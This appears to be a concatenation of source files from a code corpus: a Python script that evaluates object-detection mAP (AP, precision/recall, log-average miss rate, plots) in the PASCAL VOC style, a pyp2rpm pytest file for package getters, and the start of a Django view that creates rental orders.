# e.g. python mAP.py -ignore "person book"
flags.DEFINE_spaceseplist('ignore', None, 'ignore a list of classes')
# e.g. python mAP.py -set_class_iou "person 0.7 book 0.6"
flags.DEFINE_spaceseplist('set_class_iou', None, 'set IoU for a specific class')
# See http://host.robots.ox.ac.uk/pascal/VOC/voc2012/htmldoc/devkit_doc.html#4.4
MINOVERLAP = 0.5
'''
0,0 -------------> x (width)
|
| (Left,Top)
| *_________
| | |
| | |
y |_________|
(height) *
(Right,Bottom)
'''
def calculate_log_average_miss_rate(precision, recall):
"""
在区间 [1e-2, 1]以对数空间均匀分为 9 份,计算平均的 MR
:param precision: 精确率 TP / (TP + FP) = TP / n
:param recall: 召回率 TP / (TP + FN) = TP / P
:return: lamr: log-average miss rate
:return: mr: miss rate MR = FN / (TP + FN) = FN / P
:return: fppi: false positive per image FPPI = FP / (TP + FP) = FP / n
"""
# 如果没有此类的预测
if precision.size == 0:
lamr = 0
mr = 1
fppi = 0
return lamr, mr, fppi
fppi = 1 - precision
mr = 1 - recall
# 在起止位置插入值防止越界
fppi_tmp = np.insert(fppi, 0, -1.0)
mr_tmp = np.insert(mr, 0, 1.0)
# 将[1e-2, 1e0]在对数空间均匀分为 9 份
ref = np.logspace(-2.0, 0.0, num=9)
for i, ref_i in enumerate(ref):
# 因为 ref 的最小值为 0.01,fppi_tmp 的最小值为 -1.0
# 所以一定可以找到至少一个索引
j = np.where(fppi_tmp <= ref_i)[-1][-1]
ref[i] = mr_tmp[j]
lamr = math.exp(np.mean(np.log(np.maximum(1e-10, ref))))
return lamr, mr, fppi
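# Hedged illustration of calculate_log_average_miss_rate() on made-up arrays;
# the values only demonstrate the expected input shapes, not real detections.
def _demo_log_average_miss_rate():
    precision = np.array([1.0, 1.0, 0.67, 0.75, 0.6])
    recall = np.array([0.2, 0.4, 0.4, 0.6, 0.6])
    lamr, mr, fppi = calculate_log_average_miss_rate(precision, recall)
    print("lamr = {0:.4f}".format(lamr))
    return lamr, mr, fppi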
def check_float_between_0_and_1(value):
"""
    Check whether the value is a float strictly between 0 and 1
"""
try:
val = float(value)
if 0.0 < val < 1.0:
return True
else:
return False
except ValueError:
return False
def voc_ap(precision, recall):
"""
参考:http://host.robots.ox.ac.uk/pascal/VOC/voc2012/htmldoc/devkit_doc.html#3.4
根据 precision 和 recall 数组计算 AP:
1、计算随着 precision 递减的 Precision-recall 曲线
2、AP 就是 Precision-recall 曲线下面的面积
代码参考 VOC development kit code 中 VOCap.m
:param precision: 精确率 TP / (TP + FP) = TP / n
:param recall: 召回率 TP / (TP + FN) = TP / P
:return: ap: average-precision 平均精度
:return: precision: 横轴
:return: recall: 纵轴
"""
# 在 precision 和 recall 数组前后插值
precision.insert(0, 0.0)
precision.append(0.0)
recall.insert(0, 0.0)
recall.append(1.0)
# 让 precision 单调递减(从后往前)
for i in range(len(precision) - 2, -1, -1):
precision[i] = max(precision[i], precision[i + 1])
# 记录 recall 改变的位置
change_list = []
for i in range(1, len(recall)):
if recall[i] != recall[i - 1]:
change_list.append(i)
# 使用数值积分计算 Precision-recall 曲线下面的面积
ap = 0.0
for i in change_list:
ap += ((recall[i] - recall[i - 1]) * precision[i])
return ap, precision, recall
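# Hedged illustration of voc_ap() on made-up precision/recall lists. With these
# values the padded precision envelope becomes [1.0, 1.0, 0.75, 0.75, 0.75, 0.0],
# so AP = 0.2*1.0 + 0.2*0.75 + 0.2*0.75 + 0.4*0.0 = 0.50. Copies are passed in
# because voc_ap() mutates its arguments, as main() below also does.
def _demo_voc_ap():
    precision = [1.0, 0.5, 0.67, 0.75]
    recall = [0.2, 0.2, 0.4, 0.6]
    ap, m_precision, m_recall = voc_ap(precision[:], recall[:])
    print("AP = {0:.2f}".format(ap))
    return ap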
def file_lines_to_list(path):
"""
    Read a file and return its lines as a list
"""
with open(path) as f:
content = f.readlines()
    # Strip trailing spaces or \n from every line
content = [x.strip() for x in content]
return content
def draw_text_in_image(img, text, pos, color, line_width):
"""
    Draw text on an image
"""
font = cv2.FONT_HERSHEY_PLAIN
font_scale = 1
line_type = 1
bottom_left_corner_of_text = pos
cv2.putText(img, text, bottom_left_corner_of_text, font, font_scale, color, line_type)
text_width, _ = cv2.getTextSize(text, font, font_scale, line_type)[0]
return img, (line_width + text_width)
def adjust_axes(renderer, text, fig, axes):
"""
    Adjust the plot axes
    """
    # Measure the text width, used for re-scaling
    box = text.get_window_extent(renderer=renderer)
    text_width_inches = box.width / fig.dpi
    # Compute the scaling proportion
    current_fig_width = fig.get_figwidth()
    new_fig_width = current_fig_width + text_width_inches
    proportion = new_fig_width / current_fig_width
    # Set the maximum of the x axis
x_lim = axes.get_xlim()
axes.set_xlim([x_lim[0], x_lim[1] * proportion])
def draw_plot_func(dictionary, num_classes, window_title, plot_title, x_label, output_path, if_show, plot_color, tp_bar):
"""
    Draw a plot using Matplotlib
    """
    # Sort the dictionary by value into a list of tuples
    sort_dic_by_value = sorted(dictionary.items(), key=operator.itemgetter(1))
    # Unzip the list of tuples into two lists
    sorted_keys, sorted_values = zip(*sort_dic_by_value)
    # When a TP array is given
    if tp_bar != "":
        """
        Green: TP
        Red:   FP
        Pink:  FN
        """
fp_sorted = []
tp_sorted = []
for key in sorted_keys:
fp_sorted.append(dictionary[key] - tp_bar[key])
tp_sorted.append(tp_bar[key])
        # Draw the horizontal bar chart
plt.barh(range(num_classes), fp_sorted, align='center', color='crimson', label='False Positive')
plt.barh(range(num_classes), tp_sorted, align='center', color='forestgreen', label='True Positive',
left=fp_sorted)
plt.legend(loc='lower right')
        # Annotate the values
fig = plt.gcf()
axes = plt.gca()
renderer = fig.canvas.get_renderer()
for i, val in enumerate(sorted_values):
fp_val = fp_sorted[i]
tp_val = tp_sorted[i]
fp_str_val = " " + str(fp_val)
tp_str_val = fp_str_val + " " + str(tp_val)
text = plt.text(val, i, tp_str_val, color='forestgreen', va='center', fontweight='bold')
plt.text(val, i, fp_str_val, color='crimson', va='center', fontweight='bold')
if i == (len(sorted_values) - 1):
adjust_axes(renderer, text, fig, axes)
else:
        # Draw the horizontal bar chart
        plt.barh(range(num_classes), sorted_values, color=plot_color)
        # Annotate the values
fig = plt.gcf()
axes = plt.gca()
renderer = fig.canvas.get_renderer()
for i, val in enumerate(sorted_values):
str_val = " " + str(val)
if val < 1.0:
str_val = " {0:.2f}".format(val)
text = plt.text(val, i, str_val, color=plot_color, va='center', fontweight='bold')
if i == (len(sorted_values) - 1):
adjust_axes(renderer, text, fig, axes)
    # Set the window title
    fig.canvas.set_window_title(window_title)
    # Write the class names on the y axis
    tick_font_size = 12
    plt.yticks(range(num_classes), sorted_keys, fontsize=tick_font_size)
    # Re-scale the figure height accordingly
    init_height = fig.get_figheight()
    dpi = fig.dpi
    height_pt = num_classes * (tick_font_size * 1.4)  # 1.4 is the spacing factor
    height_in = height_pt / dpi
    top_margin = 0.15  # percentage
    bottom_margin = 0.15  # percentage
figure_height = height_in / (1 - top_margin - bottom_margin)
if figure_height > init_height:
fig.set_figheight(figure_height)
    # Set the plot title
    plt.title(plot_title, fontsize=14)
    # Set the axis label
    plt.xlabel(x_label, fontsize='large')
    # Fit to the window size
    fig.tight_layout()
    # Save the plot
    fig.savefig(output_path)
    # Show it
if if_show:
plt.show()
plt.close()
def main(_argv):
    # Check whether there are classes to ignore
if FLAGS.ignore is None:
FLAGS.ignore = []
    # Set up the file paths
ground_truth_path = os.path.join(os.getcwd(), '../data', 'ground_truth')
detection_results_path = os.path.join(os.getcwd(), '../data', 'detection_result')
image_path = os.path.join(os.getcwd(), '../data', 'VOCdevkit', 'VOC2012', 'JPEGImages')
    # Force no_animation to True when there are no images
if os.path.exists(image_path):
for root, dirs, files in os.walk(image_path):
if not files:
FLAGS.no_animation = True
else:
FLAGS.no_animation = True
    # Create the temp and output directories
temp_file_path = '.temp'
if not os.path.exists(temp_file_path):
os.makedirs(temp_file_path)
output_file_path = 'output'
if not os.path.exists(output_file_path):
os.makedirs(output_file_path)
else:
shutil.rmtree(output_file_path)
os.makedirs(output_file_path)
if not FLAGS.no_plot:
os.makedirs(os.path.join(output_file_path, 'classes'))
if not FLAGS.no_animation:
os.makedirs(os.path.join(output_file_path, 'images', 'detections_one_by_one'))
"""
    Load and parse the ground truth files
"""
    # Get the list of ground truth files
ground_truth_file_list = glob.glob(ground_truth_path + '/*.txt')
if len(ground_truth_file_list) == 0:
logging.error("没有找到ground truth文件!")
sys.exit(0)
ground_truth_file_list.sort()
ground_truth_counter_per_class = {}
image_counter_per_class = {}
ground_truth_file = []
for txt_file in ground_truth_file_list:
file_id = txt_file.split(".txt", 1)[0]
file_id = os.path.basename(os.path.normpath(file_id))
        # Check that a matching detection result file exists
result_path = os.path.join(detection_results_path, (file_id + '.txt'))
if not os.path.exists(result_path):
error_msg = "没有找到: {}\n".format(result_path)
logging.error(error_msg)
sys.exit(0)
lines_list = file_lines_to_list(txt_file)
        # Build the ground truth dictionary
bounding_boxes = []
already_seen_classes = []
for line in lines_list:
try:
if "difficult" in line:
class_name, left, top, right, bottom, _difficult = line.split()
is_difficult = True
else:
class_name, left, top, right, bottom = line.split()
is_difficult = False
except ValueError:
error_msg = txt_file + "格式错误"
logging.error(error_msg)
sys.exit(0)
            # Skip classes that should be ignored
if class_name in FLAGS.ignore:
continue
bbox = left + " " + top + " " + right + " " + bottom
bounding_boxes.append({"class_name": class_name,
"bbox": bbox,
"used": False,
"difficult": is_difficult})
            # "difficult" objects are not counted
            if not is_difficult:
                # Count the ground truth labels per class
if class_name in ground_truth_counter_per_class:
ground_truth_counter_per_class[class_name] += 1
else:
ground_truth_counter_per_class[class_name] = 1
                # Count the images per class
if class_name not in already_seen_classes:
if class_name in image_counter_per_class:
image_counter_per_class[class_name] += 1
else:
image_counter_per_class[class_name] = 1
already_seen_classes.append(class_name)
        # Save the bounding boxes to a json file
temp_file = temp_file_path + "/" + file_id + "_ground_truth.json"
ground_truth_file.append(temp_file)
with open(temp_file, 'w') as outfile:
json.dump(bounding_boxes, outfile)
ground_truth_classes = list(ground_truth_counter_per_class.keys())
ground_truth_classes = sorted(ground_truth_classes)
num_classes = len(ground_truth_classes)
    # Check whether a per-class IoU was set
iou_list = []
if FLAGS.set_class_iou is not None:
num_args = len(FLAGS.set_class_iou)
if num_args % 2 != 0:
logging.error("输入参数个数不为2的倍数!")
sys.exit(0)
special_iou_classes = FLAGS.set_class_iou[::2]
iou_list = FLAGS.set_class_iou[1::2]
for tmp_class in special_iou_classes:
if tmp_class not in ground_truth_classes:
logging.error("未知的类:" + tmp_class)
sys.exit(0)
for tmp_iou in iou_list:
if not check_float_between_0_and_1(tmp_iou):
logging.error("错误的IoU值:" + tmp_iou)
sys.exit(0)
"""
    Load and parse the detection result files
"""
    # Get the list of detection result files
detection_results_file_list = glob.glob(detection_results_path + '/*.txt')
detection_results_file_list.sort()
for class_index, class_name in enumerate(ground_truth_classes):
bounding_boxes = []
for txt_file in detection_results_file_list:
file_id = txt_file.split(".txt", 1)[0]
file_id = os.path.basename(os.path.normpath(file_id))
            # Check that a matching ground truth file exists
truth_path = os.path.join(ground_truth_path, (file_id + '.txt'))
if class_index == 0 and not os.path.exists(truth_path):
error_msg = "没有找到: {}\n".format(truth_path)
logging.error(error_msg)
sys.exit(0)
lines_list = file_lines_to_list(txt_file)
for line in lines_list:
try:
predict_class_name, confidence, left, top, right, bottom = line.split()
except ValueError:
error_msg = txt_file + "格式错误"
logging.error(error_msg)
sys.exit(0)
if predict_class_name == class_name:
bbox = left + " " + top + " " + right + " " + bottom
bounding_boxes.append({"confidence": confidence,
"bbox": bbox,
"file_id": file_id})
        # Sort the detection results by confidence in descending order
bounding_boxes.sort(key=lambda x: float(x['confidence']), reverse=True)
        # Save to a json file
with open(temp_file_path + '/' + class_name + "_detection_result.json", 'w') as outfile:
json.dump(bounding_boxes, outfile)
"""
    Compute the AP for every class
"""
sum_ap = 0.0
ap_dictionary = {}
lamr_dictionary = {}
    # Save the output
with open(output_file_path + "/output.txt", 'w') as output_file:
output_file.write("# AP and precision/recall per class\n")
true_positive_count = {}
for class_index, class_name in enumerate(ground_truth_classes):
true_positive_count[class_name] = 0
        # Load the detection results for this class
detection_results_file = temp_file_path + '/' + class_name + "_detection_result.json"
detection_results_data = json.load(open(detection_results_file))
num_data = len(detection_results_data)
tp = [0] * num_data
fp = [0] * num_data
for index, detection in enumerate(detection_results_data):
file_id = detection["file_id"]
if not FLAGS.no_animation:
                # Find the matching image
ground_truth_image = glob.glob1(image_path, file_id + ".*")
if len(ground_truth_image) == 0:
logging.error("没有找到图片:" + file_id)
sys.exit(0)
elif len(ground_truth_image) > 1:
logging.error("找到多张图片:" + file_id)
sys.exit(0)
else:
                    # Load the image
                    img = cv2.imread(image_path + '/' + ground_truth_image[0])
                    # Load the image that already has detection boxes drawn on it
img_cumulative_path = output_file_path + "/images/" + ground_truth_image[0]
if os.path.isfile(img_cumulative_path):
img_cumulative = cv2.imread(img_cumulative_path)
else:
img_cumulative = img.copy()
                    # Add a bottom border to the image
bottom_border = 60
black = [0, 0, 0]
img = cv2.copyMakeBorder(img, 0, bottom_border, 0, 0, cv2.BORDER_CONSTANT, value=black)
            # Load the matching ground truth json file
            # (a separate name keeps the ground_truth_file list built above intact)
            ground_truth_json_file = temp_file_path + "/" + file_id + "_ground_truth.json"
            ground_truth_data = json.load(open(ground_truth_json_file))
iou_max = -1
ground_truth_match = -1
            # Load the predicted box
bounding_box_dr = [float(x) for x in detection["bbox"].split()]
for obj in ground_truth_data:
                # Check whether the class name matches
                if obj["class_name"] == class_name:
                    # Load the ground truth box
bounding_box_gt = [float(x) for x in obj["bbox"].split()]
bounding_box_intersection = [max(bounding_box_dr[0], bounding_box_gt[0]),
max(bounding_box_dr[1], bounding_box_gt[1]),
min(bounding_box_dr[2], bounding_box_gt[2]),
min(bounding_box_dr[3], bounding_box_gt[3])]
intersection_width = bounding_box_intersection[2] - bounding_box_intersection[0] + 1
intersection_height = bounding_box_intersection[3] - bounding_box_intersection[1] + 1
if intersection_width > 0 and intersection_height > 0:
union = (bounding_box_dr[2] - bounding_box_dr[0] + 1) * \
(bounding_box_dr[3] - bounding_box_dr[1] + 1) + \
(bounding_box_gt[2] - bounding_box_gt[0] + 1) * \
(bounding_box_gt[3] - bounding_box_gt[1] + 1) - \
intersection_width * intersection_height
iou = intersection_width * intersection_height / union
if iou > iou_max:
iou_max = iou
ground_truth_match = obj
            # Decide whether the detection counts as a TP
if not FLAGS.no_animation:
status = "没有找到匹配项!"
min_overlap = MINOVERLAP
if FLAGS.set_class_iou is not None:
if class_name in FLAGS.set_class_iou:
iou_index = FLAGS.set_class_iou.index(class_name)
min_overlap = float(iou_list[iou_index])
if iou_max >= min_overlap:
if not ground_truth_match['difficult']:
if not bool(ground_truth_match["used"]):
# TP
tp[index] = 1
ground_truth_match["used"] = True
true_positive_count[class_name] += 1
                            # Update the json file
                            with open(ground_truth_json_file, 'w') as f:
f.write(json.dumps(ground_truth_data))
if not FLAGS.no_animation:
status = "匹配成功!"
else:
                    # FP: duplicate detection
fp[index] = 1
if iou_max > 0:
status = "重复匹配!"
else:
# FP
fp[index] = 1
if iou_max > 0:
status = "overlap 不足"
            # Show the animation
if not FLAGS.no_animation:
height, width = img.shape[:2]
                # Colours in BGR
white = (255, 255, 255)
light_blue = (255, 200, 100)
green = (0, 255, 0)
light_red = (30, 30, 255)
                # First line of text
margin = 10
v_pos = int(height - margin - (bottom_border / 2.0))
text = "Image: " + ground_truth_image[0] + " "
img, line_width = draw_text_in_image(img, text, (margin, v_pos), white, 0)
text = "Class [" + str(class_index) + "/" + str(num_classes) + "]: " + class_name + " "
img, line_width = draw_text_in_image(img, text, (margin + line_width, v_pos), light_blue,
line_width)
if iou_max != -1:
color = light_red
if status == "overlap 不足":
text = "IoU: {0:.2f}% ".format(iou_max * 100) + "< {0:.2f}% ".format(min_overlap * 100)
else:
text = "IoU: {0:.2f}% ".format(iou_max * 100) + ">= {0:.2f}% ".format(min_overlap * 100)
color = green
img, _ = draw_text_in_image(img, text, (margin + line_width, v_pos), color, line_width)
                # Second line of text
v_pos += int(bottom_border / 2.0)
rank_pos = str(index + 1)
text = "Detection #rank: " + rank_pos + \
" confidence: {0:.2f}% ".format(float(detection["confidence"]) * 100)
img, line_width = draw_text_in_image(img, text, (margin, v_pos), white, 0)
color = light_red
if status == "匹配成功!":
color = green
text = "Result: " + status + " "
img, line_width = draw_text_in_image(img, text, (margin + line_width, v_pos), color, line_width)
font = cv2.FONT_HERSHEY_SIMPLEX
                # If the predicted box and the ground truth box intersect
if iou_max > 0:
bounding_box_gt = [int(round(float(x))) for x in ground_truth_match["bbox"].split()]
cv2.rectangle(img, (bounding_box_gt[0], bounding_box_gt[1]),
(bounding_box_gt[2], bounding_box_gt[3]), light_blue, 2)
cv2.rectangle(img_cumulative, (bounding_box_gt[0], bounding_box_gt[1]),
(bounding_box_gt[2], bounding_box_gt[3]), light_blue, 2)
cv2.putText(img_cumulative, class_name, (bounding_box_gt[0], bounding_box_gt[1] - 5),
font, 0.6, light_blue, 1, cv2.LINE_AA)
bounding_box_dr = [int(i) for i in bounding_box_dr]
cv2.rectangle(img, (bounding_box_dr[0], bounding_box_dr[1]),
(bounding_box_dr[2], bounding_box_dr[3]), color, 2)
cv2.rectangle(img_cumulative, (bounding_box_dr[0], bounding_box_dr[1]),
(bounding_box_dr[2], bounding_box_dr[3]), color, 2)
cv2.putText(img_cumulative, class_name, (bounding_box_dr[0], bounding_box_dr[1] - 5),
font, 0.6, color, 1, cv2.LINE_AA)
                # Show the image
cv2.imshow("Animation", img)
cv2.waitKey(20)
                # Save the image
output_image_path = (output_file_path + "/images/detections_one_by_one/" +
class_name + "_detection" + str(index) + ".jpg")
cv2.imwrite(output_image_path, img)
cv2.imwrite(img_cumulative_path, img_cumulative)
        # Compute precision / recall
cumsum = 0
for index, val in enumerate(fp):
fp[index] += cumsum
cumsum += val
cumsum = 0
for index, val in enumerate(tp):
tp[index] += cumsum
cumsum += val
        # TODO: use numpy arrays instead of lists
recall = tp[:]
for index, val in enumerate(tp):
# noinspection PyTypeChecker
recall[index] = float(tp[index]) / ground_truth_counter_per_class[class_name]
precision = tp[:]
for index, val in enumerate(tp):
# noinspection PyTypeChecker
precision[index] = float(tp[index]) / (fp[index] + tp[index])
ap, m_precision, m_recall = voc_ap(precision[:], recall[:])
sum_ap += ap
text = "{0:.2f}%".format(ap * 100) + " = " + class_name + " AP "
        # Write to the output file
rounded_precision = ['%.2f' % elem for elem in precision]
rounded_recall = ['%.2f' % elem for elem in recall]
output_file.write(text + "\n Precision: " + str(rounded_precision) + "\n Recall :" + str(rounded_recall) + "\n\n")
if not FLAGS.quiet:
print(text)
ap_dictionary[class_name] = ap
_num_images = image_counter_per_class[class_name]
lamr, mr, fppi = calculate_log_average_miss_rate(np.array(precision), np.array(recall))
lamr_dictionary[class_name] = lamr
        # Draw the plot
if not FLAGS.no_plot:
plt.plot(recall, precision, '-o')
            # Insert the point (m_recall[-2], 0.0) before the last element, because the final segment does not change the AP value
            area_under_curve_x = m_recall[:-1] + [m_recall[-2]] + [m_recall[-1]]
area_under_curve_y = m_precision[:-1] + [0.0] + [m_precision[-1]]
plt.fill_between(area_under_curve_x, 0, area_under_curve_y, alpha=0.2, edgecolor='r')
            # Set the window title
fig = plt.gcf()
fig.canvas.set_window_title('AP ' + class_name)
            # Set the plot title
plt.title('class:' + text)
            # Set the axis labels
plt.xlabel('Recall')
plt.ylabel('Precision')
            # Set the axis limits
axes = plt.gca()
axes.set_xlim([0.0, 1.0])
axes.set_ylim([0.0, 1.05])
            # Save the plot
fig.savefig(output_file_path + "/classes/" + class_name + ".png")
plt.cla()
if not FLAGS.no_animation:
cv2.destroyAllWindows()
output_file.write("\n# mAP of all classes\n")
m_ap = sum_ap / num_classes
text = "mAP = {0:.2f}%".format(m_ap * 100)
output_file.write(text + "\n")
print(text)
    # Mark the unmatched ground truth boxes on the cumulative images
if not FLAGS.no_animation:
pink = (203, 192, 255)
for tmp_file in ground_truth_file:
ground_truth_data = json.load(open(tmp_file))
start = temp_file_path + '/'
img_id = tmp_file[tmp_file.find(start) + len(start): tmp_file.rfind('_ground_truth.json')]
img_cumulative_path = output_file_path + "/images/" + img_id + ".jpg"
img = cv2.imread(img_cumulative_path)
if img is None:
img_path = image_path + '/' + img_id + ".jpg"
img = cv2.imread(img_path)
            # Draw the unmatched ground truth boxes
for obj in ground_truth_data:
if not obj['used']:
bounding_box_gt = [int(round(float(x))) for x in obj["bbox"].split()]
cv2.rectangle(img, (bounding_box_gt[0], bounding_box_gt[1]),
(bounding_box_gt[2], bounding_box_gt[3]), pink, 2)
cv2.imwrite(img_cumulative_path, img)
    # Count the total number of detection results
detection_result_counter_per_class = {}
for txt_file in detection_results_file_list:
lines_list = file_lines_to_list(txt_file)
for line in lines_list:
class_name = line.split()[0]
if class_name in FLAGS.ignore:
continue
if class_name in detection_result_counter_per_class:
detection_result_counter_per_class[class_name] += 1
else:
detection_result_counter_per_class[class_name] = 1
detection_result_classes = list(detection_result_counter_per_class.keys())
    # Plot the number of ground truth objects per class
if not FLAGS.no_plot:
window_title = "ground-truth-info"
plot_title = "ground-truth\n"
plot_title += "(" + str(len(ground_truth_file_list)) + " files and " + str(num_classes) + " classes)"
x_label = "Number of objects per class"
output_path = output_file_path + "/ground-truth-info.png"
to_show = False
plot_color = 'forestgreen'
draw_plot_func(ground_truth_counter_per_class, num_classes, window_title, plot_title, x_label, output_path,
to_show, plot_color, '')
    # Write the number of ground truth objects per class to output.txt
with open(output_file_path + "/output.txt", 'a') as output_file:
output_file.write("\n# Number of ground-truth objects per class\n")
for class_name in sorted(ground_truth_counter_per_class):
output_file.write(class_name + ": " + str(ground_truth_counter_per_class[class_name]) + "\n")
    # Finish counting the TPs
    for class_name in detection_result_classes:
        # A class that appears in the detection results but not in the ground truth has no TP
if class_name not in ground_truth_classes:
true_positive_count[class_name] = 0
    # Plot the number of detection results per class
if not FLAGS.no_plot:
window_title = "detection-results-info"
plot_title = "detection-results\n"
plot_title += "(" + str(len(detection_results_file_list)) + " files and "
count_non_zero_values_in_dictionary = sum(int(x) > 0 for x in list(detection_result_counter_per_class.values()))
plot_title += str(count_non_zero_values_in_dictionary) + " detected classes)"
x_label = "Number of objects per class"
output_path = output_file_path + "/detection-results-info.png"
to_show = False
plot_color = 'forestgreen'
true_positive_bar = true_positive_count
draw_plot_func(detection_result_counter_per_class, len(detection_result_counter_per_class), window_title,
plot_title, x_label, output_path, to_show, plot_color, true_positive_bar)
    # Write the number of detected objects per class to output.txt
with open(output_file_path + "/output.txt", 'a') as output_file:
output_file.write("\n# Number of detected objects per class\n")
for class_name in sorted(detection_result_classes):
output_file.write(class_name + ": " + str(detection_result_counter_per_class[class_name]) +
" (tp:" + str(true_positive_count[class_name]) + ", fp:" +
str(detection_result_counter_per_class[class_name] - true_positive_count[class_name]) +
")\n")
# log-average miss rate
if not FLAGS.no_plot:
window_title = "lamr"
plot_title = "log-average miss rate"
x_label = "log-average miss rate"
output_path = output_file_path + "/lamr.png"
to_show = False
plot_color = 'royalblue'
draw_plot_func(lamr_dictionary, num_classes, window_title, plot_title, x_label, output_path, to_show,
plot_color, "")
# mAP
if not FLAGS.no_plot:
window_title = "mAP"
plot_title = "mAP = {0:.2f}%".format(m_ap * 100)
x_label = "Average Precision"
output_path = output_file_path + "/mAP.png"
to_show = True
plot_color = 'royalblue'
draw_plot_func(ap_dictionary, num_classes, window_title, plot_title, x_label, output_path, to_show,
plot_color, "")
    # Remove the temp directory
shutil.rmtree(temp_file_path)
if __name__ == '__main__':
try:
app.run(main)
except SystemExit:
pass
``` |
{
"source": "00willo/pyp2rpm",
"score": 2
} |
#### File: pyp2rpm/tests/test_package_getters.py
```python
import os
import tempfile
import shutil
import pytest
from flexmock import flexmock
try:
import xmlrpclib
except ImportError:
import xmlrpc.client as xmlrpclib
from pyp2rpm.package_getters import LocalFileGetter, PypiDownloader, get_url
from pyp2rpm.exceptions import MissingUrlException, NoSuchPackageException
from pyp2rpm import settings
tests_dir = os.path.split(os.path.abspath(__file__))[0]
class TestPackageGetters(object):
client = xmlrpclib.ServerProxy(settings.PYPI_URL)
@pytest.mark.parametrize(('name', 'version', 'wheel', 'hf', 'expected_url', 'expected_md5'), [
('setuptools', '18.3.1', False, False,
'https://files.pythonhosted.org/packages/source/s/setuptools/setuptools-18.3.1.tar.gz',
'748187b93152fa60287dfb896837fd7c'),
('setuptools', '18.3.1', True, False,
'https://files.pythonhosted.org/packages/source/s/setuptools/setuptools-18.3.1-py2.py3-none-any.whl',
'a21a4d02d0bab2eac499cca72faeb076'),
('setuptools', '18.3.1', False, True,
'https://files.pythonhosted.org/packages/86/8a/c4666b05c74e840eb9b09d28f4e7ae76fc9075e8c653d0eb4d265a5b49d9/setuptools-18.3.1.tar.gz',
'748187b93152fa60287dfb896837fd7c'),
('pypandoc', '1.1.3', False, False,
'https://files.pythonhosted.org/packages/source/p/pypandoc/pypandoc-1.1.3.zip',
'771f376bf9c936a90159cd94235998c2'),
])
@pytest.mark.webtest
def test_get_url(self, name, version, wheel, hf,
expected_url, expected_md5):
assert (expected_url, expected_md5) == get_url(
self.client, name, version, wheel, hf)
@pytest.mark.parametrize(('name', 'version', 'wheel', 'hf',
'exception', 'error_msg'), [
('nonexistent_pkg', '0.0.0', False, False, MissingUrlException,
'Url of source archive not found.'),
('Pymacs', '0.25', False, False, MissingUrlException,
'Pymacs package has no sources on PyPI, Please ask the maintainer to upload sources.'),
])
@pytest.mark.webtest
def test_get_url_raises(self, name, version, wheel, hf,
exception, error_msg):
with pytest.raises(exception) as exc_info:
get_url(self.client, name, version, wheel, hf)
assert error_msg == str(exc_info.value)
class TestPypiFileGetter(object):
client = flexmock(
package_releases=lambda n, hidden: n == 'spam' and ['3.rc1', '2', '1'] or [],
release_urls=lambda n, v: n == 'spam' and v in [
'3.rc1', '2', '1'] and [{'url': 'spam'}] or []
)
@pytest.mark.parametrize(('name', 'version'), [
('eggs', '2'),
('spam', '3'),
])
def test_init_bad_data(self, name, version):
with pytest.raises(NoSuchPackageException):
PypiDownloader(self.client, name, version)
@pytest.mark.parametrize(('name', 'version', 'expected_ver'), [
('spam', '1', '1'),
('spam', None, '2'),
])
def test_init_good_data(self, name, version, expected_ver):
d = PypiDownloader(self.client, name, version)
assert d.version == expected_ver
@pytest.mark.parametrize(('name', 'version', 'expected_ver'), [
('spam', '1', '1'),
('spam', None, '3.rc1'),
])
def test_init_good_data_pre(self, name, version, expected_ver):
d = PypiDownloader(self.client, name, version, prerelease=True)
assert d.version == expected_ver
class TestLocalFileGetter(object):
td_dir = '{0}/test_data/'.format(tests_dir)
def setup_method(self, method):
self.l = [LocalFileGetter('{0}plumbum-0.9.0.tar.gz'.format(
self.td_dir)),
LocalFileGetter('{0}Sphinx-1.1.3-py2.6.egg'.format(
self.td_dir)),
LocalFileGetter('{0}unextractable-1.tar'.format(
self.td_dir)),
LocalFileGetter(
'{0}setuptools-19.6-py2.py3-none-any.whl'.format(
self.td_dir)),
LocalFileGetter(
'{0}py2exe-0.9.2.2-py33.py34-none-any.whl'.format(
self.td_dir)),
LocalFileGetter('python-foo-1.tar'),
LocalFileGetter('python-many-dashes-foo-1.tar'),
]
def teardown_method(self, method):
for file_getter in self.l:
if hasattr(file_getter, 'temp_dir'):
shutil.rmtree(file_getter.temp_dir)
@pytest.mark.parametrize(('i', 'expected'), [
(0, 'plumbum-0.9.0'),
(1, 'Sphinx-1.1.3-py2.6'),
(2, 'unextractable-1'),
(3, 'setuptools-19.6-py2.py3-none-any'),
(4, 'py2exe-0.9.2.2-py33.py34-none-any'),
])
def test_stripped_name_version(self, i, expected):
assert self.l[i]._stripped_name_version == expected
@pytest.mark.parametrize(('i', 'expected'), [
(0, ('plumbum', '0.9.0')),
(1, ('Sphinx', '1.1.3')),
(3, ('setuptools', '19.6')),
(4, ('py2exe', '0.9.2.2')),
(5, ('python-foo', '1')),
(6, ('python-many-dashes-foo', '1')),
])
def test_get_name_version(self, i, expected):
assert self.l[i].get_name_version() == expected
def test_get_non_existent_file(self):
with pytest.raises(EnvironmentError):
LocalFileGetter('/this/path/doesnot/exist',
tempfile.gettempdir()).get()
def test_get_existent_file(self):
tmpdir = tempfile.gettempdir()
in_tmp_dir = os.path.join(tmpdir, 'plumbum-0.9.0.tar.gz')
self.l[0].save_dir = tmpdir
if os.path.exists(in_tmp_dir):
os.unlink(in_tmp_dir)
assert self.l[0].get() == in_tmp_dir
assert os.path.exists(self.l[0].get())
os.unlink(in_tmp_dir)
def test_get_to_same_location(self):
tmpdir = tempfile.gettempdir()
self.l[1].save_dir = self.td_dir
assert os.path.samefile(self.l[1].get(), os.path.join(
self.td_dir, 'Sphinx-1.1.3-py2.6.egg'))
assert not os.path.exists(os.path.join(tmpdir,
'Sphinx-1.1.3-py2.6.egg'))
``` |
{
"source": "00wsmart00/ihome_project",
"score": 2
} |
#### File: apps/order/views.py
```python
import datetime
import json
from django import http
from django.shortcuts import render
# Create your views here.
from django.views import View
from houses.models import House
from ihome.utils.response_code import RET
from order.models import Order
class OrderView(View):
"""订单"""
def post(self, request):
"""添加订单"""
json_dict = json.loads(request.body.decode())
house_id = json_dict.get('house_id')
start_date = json_dict.get('start_date')
end_date = json_dict.get('end_date')
date1 = datetime.datetime.strptime(start_date, "%Y-%m-%d")
date2 = datetime.datetime.strptime(end_date, "%Y-%m-%d")
days = (date2 - date1).days
house_price = House.objects.get(id=house_id).price
amount = days * house_price
        # Save the order data
try:
order_house = Order.objects.create(
house_id=house_id,
begin_date=start_date,
end_date=end_date,
user_id=request.user.id,
days=days,
house_price=house_price,
amount=amount
)
except Exception as e:
print(e)
